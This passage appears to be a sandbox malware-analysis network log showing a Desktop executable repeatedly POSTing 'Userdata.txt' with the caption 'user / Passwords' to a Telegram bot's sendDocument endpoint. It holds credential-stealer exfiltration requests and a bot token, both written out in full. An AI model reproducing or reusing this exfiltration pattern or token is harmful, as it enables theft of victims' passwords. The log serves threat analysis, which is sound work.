                                                                                                                2025-01-10 21:43:45 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43625,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545425,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.649997149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:46 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3202163f9add
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 32 31 36 33 66 39 61 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3202163f9addContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:47 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:47 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:47 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43626,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545427,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.649999149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:48 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3215538ae355
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 35 35 33 38 61 65 33 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3215538ae355Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:48 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:48 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:48 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43627,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545428,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.650001149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:50 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3227251c8d9e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 37 32 35 31 63 38 64 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3227251c8d9eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:50 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:50 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:50 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43628,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545430,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.650003149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:52 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd323fbd7b0627
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:43:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 66 62 64 37 62 30 36 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd323fbd7b0627Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:52 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:52 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:52 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43629,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545432,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.650005149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:53 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd325171dc5706
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 31 37 31 64 63 35 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd325171dc5706Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:53 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:53 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:53 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43630,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545433,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.650007149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:55 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3261bf4f0807
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 31 62 66 34 66 30 38 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3261bf4f0807Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:55 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:55 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:43:55 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43631,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545435,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.650009149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:56 UTC274OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd32735dd22759
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                2025-01-10 21:43:56 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 33 35 64 64 32 32 37 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd32735dd22759Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:43:56 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:43:56 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
